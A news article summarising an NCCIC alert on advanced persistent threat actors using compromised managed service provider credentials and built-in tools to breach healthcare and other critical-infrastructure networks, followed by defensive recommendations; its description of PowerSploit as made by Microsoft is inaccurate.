- Advanced persistent threats (APTs) are targeting managed service providers’ networks, endangering healthcare data security and data security in other US critical infrastructure sectors, warned the National Cybersecurity and Communications Integration Center (NCCIC) in an Oct. 3 alert.
A successful APT attack can result in loss of PHI and other sensitive information, disruption of operations, costs to restore systems and files, and harm to the organization’s reputation, the alert related.
MSPs provide remote management of IT and end-user systems for customers. As a result, they have direct access to their customers networks and may store customer data in their own infrastructure.
A compromise in one part of an MSP’s network can spread, affecting other customers.
“Using an MSP significantly increases an organization’s virtual enterprise infrastructure footprint and its number of privileged accounts, creating a larger attack surface for cybercriminals and nation-state actors,” the alert noted.
“By using compromised legitimate MSP credentials (e.g., administration, domain, user), APT actors can move bidirectionally between an MSP and its customers’ shared networks. Bidirectional movement between networks allows APT actors to easily obfuscate detection measures and maintain a presence on victims’ networks,” it added.
To hide their presence, APT attackers exploit legitimate credentials, trusted off-the-shelf applications, and pre-installed system tools already on MSP customer networks. Pre-installed tools include command line scripts, which are used to discover accounts and remote systems.
APT attackers can use PowerSploit, a penetration testing tool made by Microsoft, to obscure their malicious activities.
“When APT actors use system tools and common cloud services, it can also be difficult for network defenders to detect data exfiltration,” NCCIC noted.
APT attackers have also used Microsoft command line tool Robocopy to transfer data from MSP client networks back through MSP network environments. They have also been known to use legitimate PuTTY Secure Copy Client functions to transfer stolen data securely and directly to third-party systems.
NCCIC advised organizations to configure system logs to detect incidents and identify the type and scope of malicious activity. This will enable rapid containment of the APT attack and appropriate response.
The most common attack methods used by APT attackers include spearphishing, malicious web content, and credential theft.
Organizations should prepare for APTs by:
- Establishing and periodically updating an incident response plan
- Establishing written guidelines that prioritize incidents based on mission impact, so that an appropriate response can be initiated
- Developing procedures and out-of-band lines of communication to handle incident reporting for internal and external relationships
- Exercising incident response measures for various intrusion scenarios regularly, as part of a training regime
- Committing to an effort that secures the endpoint and network infrastructure
MSP clients, such as healthcare organizations, should understand the supply chain risk associated with their MSP. Organizations should manage risk equally across their security, legal, and procurement groups.
MSP clients should also refer to NIST cloud security guidance to learn about MSP terms of service, architecture, security controls, and risks associated with cloud computing and data protection.
NCCIC said that restricting access to networks and systems is critical in containing an APT attacker’s movement around the network.
Compromised account credentials continue to be the number one way threat actors can penetrate a network environment. The accounts organizations create for MSPs increase the risk of credential compromise, as MSP accounts typically require elevated access.
NCCIC said it is important organizations adhere to best practices for password and permission management, as this can severely limit a threat actor’s ability to access and move laterally across a network.
Building a sound architecture supported by strong technical controls is only the first part to protecting a network environment, explained NCCIC. Organizations should continuously monitor their systems, update configurations to reflect changes in their network environment, and maintain relationships with MSPs.
NCCIC advised organizations to use a defense-in-depth strategy to increase the probability of identifying an intrusion, stopping malware, and disrupting APT activity.